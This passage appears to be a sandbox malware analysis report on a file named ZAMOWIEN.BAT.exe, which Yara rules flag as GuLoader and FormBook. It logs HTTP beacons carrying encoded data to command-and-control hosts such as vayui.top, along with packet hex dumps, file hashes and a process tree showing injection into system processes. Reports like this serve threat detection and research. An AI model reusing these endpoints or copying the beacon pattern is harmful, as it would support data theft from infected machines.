                                                                          Dec 2, 2024 07:09:45.075952053 CET1236INData Raw: eb 73 27 91 6e bb 7d 47 c5 9e 54 42 90 36 10 6a 62 07 39 82 e8 1d 38 84 75 8e fd 26 ef a6 f3 dd c5 69 c0 46 1d 4a 29 88 f5 e9 0d 23 eb 0f d3 18 52 85 6c a6 85 ff 02 9d 70 58 bb 0e da df fb 34 b4 49 fa 2b 64 6e ba fd 75 43 72 5b c2 b7 69 45 b7 aa
                                                                          Data Ascii: s'n}GTB6jb98u&iFJ)#RlpX4I+dnuCr[iE#*/iZG4xlFq%Yn^R_}GBJvN7gs`%g)EA$EIzOod\6Ez3h|D%w'l(Ce
                                                                          Dec 2, 2024 07:09:45.075963974 CET1236INData Raw: 66 19 3f d8 e7 09 87 12 b3 bc 9a 5b f9 36 a4 18 5e a0 4b 22 e6 78 87 42 88 3c 15 e3 27 d1 87 e6 4e f1 f6 89 04 47 ec fa e6 1b 87 0e 13 7d ed e1 69 7b 32 49 28 8c be a8 8c b9 c9 c9 5a 57 73 3e 0f 26 81 ce 56 93 66 e3 9b 5f 73 76 a8 f0 4c d3 fd 32
                                                                          Data Ascii: f?[6^K"xB<'NG}i{2I(ZWs>&Vf_svL2h3C"UVf]8?P97o:cXX8[nrTO|&Gl7sp}|@`G!W{2'|3wl=u&k*3g|d6|Q+wj0<y4=CGsn])T_
                                                                          Dec 2, 2024 07:09:45.195900917 CET1236INData Raw: a4 01 da 11 a5 66 ad c9 c7 23 b6 65 00 3c e2 78 29 3a 99 fa 1c 73 2b 94 98 c8 e0 6d 12 6c ea cd b8 36 01 e1 04 f7 7d 5e 83 d2 02 3c 94 e8 15 64 7a 2a f4 3c c6 7e d0 57 2c c8 41 bd aa 5d 6b 55 d9 c8 82 b0 a0 73 8f a1 65 ec 80 2d 66 17 5a fb f9 3c
                                                                          Data Ascii: f#e<x):s+ml6}^<dz*<~W,A]kUse-fZ<~LgZSK]uwPUlto4>uB*mI>2]/26C^ $c+i!;>Ypj{}N&a4:YQN6O/(ce/FA,(cV


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.449803195.110.124.133803448C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2024 07:10:27.039174080 CET472OUTGET /vlg0/?WPjx20M=qomJeF/TtZ0QUZ/lu9XGw5rEDKlC0VH3n7TxRqREffWgONqaapTJswa8a+ti36YSjfwaEcz7GfWHOzY8D/KxwVpCEXfXsdPRTHALBjA15rmVzjOLWJp7K7s=&bxJPx=a6h4-FrPGbkpc HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-us
                                                                          Host: www.officinadelpasso.shop
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                          Dec 2, 2024 07:10:28.386822939 CET367INHTTP/1.1 404 Not Found
                                                                          Date: Mon, 02 Dec 2024 06:10:28 GMT
                                                                          Server: Apache
                                                                          Content-Length: 203
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 76 6c 67 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /vlg0/ was not found on this server.</p></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.449844172.67.145.234803448C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2024 07:10:44.022880077 CET711OUTPOST /4twy/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-us
                                                                          Host: www.vayui.top
                                                                          Origin: http://www.vayui.top
                                                                          Referer: http://www.vayui.top/4twy/
                                                                          Cache-Control: max-age=0
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 204
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                          Data Raw: 57 50 6a 78 32 30 4d 3d 72 44 71 6b 6d 68 44 32 4c 4f 6e 54 78 39 72 38 66 73 62 6d 7a 32 4f 38 69 4d 43 57 46 50 57 4d 78 43 6a 49 6e 6b 36 6d 67 66 6a 48 6c 72 69 50 6d 41 63 33 58 34 73 55 46 69 39 69 48 79 79 67 79 72 4f 45 48 2f 54 4f 58 43 45 4c 41 34 2b 2f 4f 64 58 46 48 64 49 39 6a 53 79 6f 45 79 35 38 62 35 77 75 31 54 57 6d 2f 45 71 53 37 49 4b 63 69 72 54 35 66 57 49 33 75 66 4a 47 4a 43 61 54 39 59 31 6e 68 73 35 6a 46 6f 51 57 34 65 6e 6e 68 62 63 7a 6f 4e 4f 37 78 69 64 6b 73 6e 4e 35 54 48 59 48 68 58 6d 30 4a 39 35 46 73 55 50 67 57 45 45 6d 71 6c 6d 4f 56 49 72 31 64 71 4d 43 32 51 3d 3d
                                                                          Data Ascii: WPjx20M=rDqkmhD2LOnTx9r8fsbmz2O8iMCWFPWMxCjInk6mgfjHlriPmAc3X4sUFi9iHyygyrOEH/TOXCELA4+/OdXFHdI9jSyoEy58b5wu1TWm/EqS7IKcirT5fWI3ufJGJCaT9Y1nhs5jFoQW4ennhbczoNO7xidksnN5THYHhXm0J95FsUPgWEEmqlmOVIr1dqMC2Q==
                                                                          Dec 2, 2024 07:10:45.306675911 CET908INHTTP/1.1 404 Not Found
                                                                          Date: Mon, 02 Dec 2024 06:10:45 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fbDtQFdH5vqzgzxEqH9Up%2BQph0L4%2FNCHYnHPeq6fKeK9wVHQR%2FbZ0K3I5uPKJL3eveHE8KTU0TMnW8K3kZ5%2BjT1VOo287VtkcncTTqJ7KwOxQrPQgma7ZwJj2RmpzNDv"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8eb927d74c620f60-EWR
                                                                          Content-Encoding: gzip
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1486&min_rtt=1486&rtt_var=743&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=711&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                          Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.449850172.67.145.234803448C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2024 07:10:46.771848917 CET731OUTPOST /4twy/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-us
                                                                          Host: www.vayui.top
                                                                          Origin: http://www.vayui.top
                                                                          Referer: http://www.vayui.top/4twy/
                                                                          Cache-Control: max-age=0
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 224
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                          Data Raw: 57 50 6a 78 32 30 4d 3d 72 44 71 6b 6d 68 44 32 4c 4f 6e 54 6a 73 62 38 64 50 44 6d 30 57 4f 37 2b 63 43 57 4c 76 57 49 78 43 66 49 6e 67 6a 68 68 74 33 48 6b 4f 47 50 30 56 6f 33 51 34 73 55 4e 43 39 6e 59 69 7a 73 79 72 43 69 48 36 37 4f 58 43 51 4c 41 34 4f 2f 4f 71 37 43 47 4e 49 2f 6c 53 79 75 5a 43 35 38 62 35 77 75 31 51 72 44 2f 45 79 53 37 34 61 63 6a 4a 37 36 44 47 49 77 76 66 4a 47 4e 43 61 58 39 59 31 4a 68 75 64 64 46 72 6f 57 34 62 4c 6e 68 4b 63 77 69 4e 4f 39 76 53 63 74 73 31 56 30 55 48 42 4b 6e 31 50 56 55 73 52 32 74 53 43 36 48 31 6c 78 34 6c 43 39 49 50 69 42 51 70 78 4c 74 56 72 55 54 57 43 44 4c 44 71 4f 36 59 64 35 73 4a 37 69 45 44 41 3d
                                                                          Data Ascii: WPjx20M=rDqkmhD2LOnTjsb8dPDm0WO7+cCWLvWIxCfIngjhht3HkOGP0Vo3Q4sUNC9nYizsyrCiH67OXCQLA4O/Oq7CGNI/lSyuZC58b5wu1QrD/EyS74acjJ76DGIwvfJGNCaX9Y1JhuddFroW4bLnhKcwiNO9vScts1V0UHBKn1PVUsR2tSC6H1lx4lC9IPiBQpxLtVrUTWCDLDqO6Yd5sJ7iEDA=
                                                                          Dec 2, 2024 07:10:47.946129084 CET908INHTTP/1.1 404 Not Found
                                                                          Date: Mon, 02 Dec 2024 06:10:47 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oEIWy2cbIzmxwlo7Ub5u%2FFjh%2BfUS0lr3QbBfQVKN2LmUOD8bwtfkJMCD3JoWp6W%2FscuaPV8Ted2jeQ17w0UTbuGHRReF%2FGHRgoHRtrZnSisO0kYmCsOvgM4JI1r9TVH9"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8eb927e7be114294-EWR
                                                                          Content-Encoding: gzip
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1713&min_rtt=1713&rtt_var=856&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=731&delivery_rate=0&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                          Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          4192.168.2.449856172.67.145.234803448C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2024 07:10:49.529058933 CET10813OUTPOST /4twy/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-us
                                                                          Host: www.vayui.top
                                                                          Origin: http://www.vayui.top
                                                                          Referer: http://www.vayui.top/4twy/
                                                                          Cache-Control: max-age=0
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 10304
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                          Data Raw: 57 50 6a 78 32 30 4d 3d 72 44 71 6b 6d 68 44 32 4c 4f 6e 54 6a 73 62 38 64 50 44 6d 30 57 4f 37 2b 63 43 57 4c 76 57 49 78 43 66 49 6e 67 6a 68 68 73 50 48 6b 34 4b 50 6d 6d 77 33 52 34 73 55 4f 43 39 6d 59 69 7a 68 79 72 61 6d 48 36 2f 77 58 41 6f 4c 50 36 47 2f 49 62 37 43 54 64 49 2f 6e 53 79 72 45 79 34 6b 62 34 41 71 31 51 37 44 2f 45 79 53 37 39 57 63 6b 62 54 36 51 32 49 33 75 66 4a 43 4a 43 61 2f 39 59 64 2f 68 75 49 6f 47 62 49 57 35 37 62 6e 6e 34 6b 77 67 74 4f 2f 75 53 63 31 73 31 6f 30 55 48 64 73 6e 77 61 41 55 76 4e 32 76 44 32 35 55 47 4e 77 36 6a 4f 63 56 4f 61 46 53 34 52 72 6b 7a 4c 67 54 6e 6e 44 57 33 72 68 77 59 49 65 34 62 54 4b 47 6e 45 67 5a 55 50 48 51 2b 66 34 4a 45 6a 50 57 56 34 6e 6f 62 69 49 6d 44 53 4a 74 49 58 73 6b 56 49 44 33 56 38 72 4b 4d 61 6d 4d 71 73 37 61 47 41 36 37 76 62 55 67 44 74 49 75 4b 42 30 65 76 6d 69 6b 32 38 37 66 4b 70 57 61 68 6f 50 73 46 63 39 6b 61 31 6e 6d 55 6d 4e 6f 39 4d 33 2b 2f 2b 7a 6d 63 62 33 30 47 33 73 45 39 65 59 78 56 33 59 4b 65 [TRUNCATED]
                                                                          Data Ascii: WPjx20M=rDqkmhD2LOnTjsb8dPDm0WO7+cCWLvWIxCfIngjhhsPHk4KPmmw3R4sUOC9mYizhyramH6/wXAoLP6G/Ib7CTdI/nSyrEy4kb4Aq1Q7D/EyS79WckbT6Q2I3ufJCJCa/9Yd/huIoGbIW57bnn4kwgtO/uSc1s1o0UHdsnwaAUvN2vD25UGNw6jOcVOaFS4RrkzLgTnnDW3rhwYIe4bTKGnEgZUPHQ+f4JEjPWV4nobiImDSJtIXskVID3V8rKMamMqs7aGA67vbUgDtIuKB0evmik287fKpWahoPsFc9ka1nmUmNo9M3+/+zmcb30G3sE9eYxV3YKeiOaB5iTXlyuoo6YA9ztImsejoQCb/ulwnEBBzgMWu6ZQR6bDuTqBYdZlU7FwBe9SjF9DYaOc/36NgECFaWkhEHaDDjR8Gkov0VqdcQbIlRDD53Mm/PdR0sGmVgHVtXaY8SGELUUd0nyzRKQ0VP71RFb6Ymei4cJ8Rx5lZJaWC6pwOz3FHQGQKSXUAR/SBL+09I0ERyS5zBZ3p/LMDDxshbasfQxBobhc4aqiUXTz+L5qJjjg/cSW7KKKM63p9mgsnx6AE411pbBff0FEV6BmyZqe/MaYm4dMSexPo/diL/pn/YKJmcASZ1/9OnFFhDE9v50IlIBXDPnF13+1ZgUiWgXZ7qpV+T6RO+QgNuwuz6M1LiWQWDCmvQTbRpAw1Fv3FbU9jsI8pevETjMQe1w1brzS60m0SRT98soNyl7EOSHCGbbg4b3UjkpeOecCknu8ZfcOVgqpZTUQv/DR2C71cNm0tFBitRBKLJ1qChgkcUrs03b3viycPJqlLWnSW7BAZMWa64YNGsp4g5StgCZfyXYNpjC9E4nVzQE8wxiVlAueNeo0tdx/gmYSLRu/y/8Rgl/FQCkZKK3vovXH+CcsC54tBbJBcKegNIjy3pbpuW4RjstGPwzKKpv5Tw6Kg84x97TNZ7Ye1hJMjf/Bjee2zN1GJqQJrFBoSo [TRUNCATED]
                                                                          Dec 2, 2024 07:10:50.709623098 CET909INHTTP/1.1 404 Not Found
                                                                          Date: Mon, 02 Dec 2024 06:10:50 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Amd3muBhw0lr9yOsgIVTXOd6piF8IyWGGgVEoLmlLM5KfSLUidfU2x%2FqlRRk7%2BhyS81Zdb54wpulQSueONeSOFQMCnRQ2a6ZiA80maXAnQtN8eE%2F9B9xUM0sdOP2QMUB"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8eb927f8ed518c42-EWR
                                                                          Content-Encoding: gzip
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1982&min_rtt=1982&rtt_var=991&sent=7&recv=12&lost=0&retrans=0&sent_bytes=0&recv_bytes=10813&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                          Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          5192.168.2.449865172.67.145.234803448C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Dec 2, 2024 07:10:52.202168941 CET460OUTGET /4twy/?WPjx20M=mBCElVLkK93E7Nf+SfzPyEy2pe/+ELSSyRrruRXkg+zqtIWho1c/UIFICRtgbVPxo7eZFunASSkRDpjuJtL+SqF6mTOIbDVEeaMEgz/yh1+O2PfmmYS3a3E=&bxJPx=a6h4-FrPGbkpc HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                          Accept-Language: en-us
                                                                          Host: www.vayui.top
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
                                                                          Dec 2, 2024 07:10:53.419974089 CET919INHTTP/1.1 404 Not Found
                                                                          Date: Mon, 02 Dec 2024 06:10:53 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0ptIhjyLo636hqVzj9NRO5lXvHSLk1Gz1HFNam%2BQiz8zfRogeGEXpgyXO2LRPWVQQ8h06MfE9wCqhm4yerlS%2BEEBo2PHiY1ilEFxIeL1%2BbOY28lnJaRBAtcnB5RnqAeR"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8eb92809fbed42da-EWR
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1574&min_rtt=1574&rtt_var=787&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=460&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                          Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                          Click to jump to process

                                                                          Click to jump to process

                                                                          Click to jump to process

                                                                          Target ID:0
                                                                          Start time:01:08:53
                                                                          Start date:02/12/2024
                                                                          Path:C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"
                                                                          Imagebase:0x400000
                                                                          File size:751'345 bytes
                                                                          MD5 hash:2DBE82E3BC304A5B59B1B7C080464F60
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2063039037.0000000004F1D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:4
                                                                          Start time:01:09:34
                                                                          Start date:02/12/2024
                                                                          Path:C:\Users\user\Desktop\ZAMOWIEN.BAT.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"
                                                                          Imagebase:0x400000
                                                                          File size:751'345 bytes
                                                                          MD5 hash:2DBE82E3BC304A5B59B1B7C080464F60
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2456986862.00000000324B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2457299942.0000000035D10000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low
                                                                          Has exited:true

                                                                          Target ID:5
                                                                          Start time:01:10:03
                                                                          Start date:02/12/2024
                                                                          Path:C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe"
                                                                          Imagebase:0xe00000
                                                                          File size:140'800 bytes
                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2885603414.0000000005530000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          Target ID:6
                                                                          Start time:01:10:05
                                                                          Start date:02/12/2024
                                                                          Path:C:\Windows\SysWOW64\sdchange.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\SysWOW64\sdchange.exe"
                                                                          Imagebase:0x300000
                                                                          File size:40'960 bytes
                                                                          MD5 hash:8E93B557363D8400A8B9F2D70AEB222B
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2885632879.0000000004E10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2885664510.0000000004E60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:moderate
                                                                          Has exited:false

                                                                          Target ID:8
                                                                          Start time:01:10:19
                                                                          Start date:02/12/2024
                                                                          Path:C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe"
                                                                          Imagebase:0xe00000
                                                                          File size:140'800 bytes
                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.2885196470.0000000000920000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          Target ID:9
                                                                          Start time:01:10:31
                                                                          Start date:02/12/2024
                                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                          Imagebase:0x7ff6bf500000
                                                                          File size:676'768 bytes
                                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                          Has elevated privileges:false
                                                                          Has administrator privileges:false
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Reset < >

                                                                            Execution Graph

                                                                            Execution Coverage:27.3%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:18.5%
                                                                            Total number of Nodes:723
                                                                            Total number of Limit Nodes:19
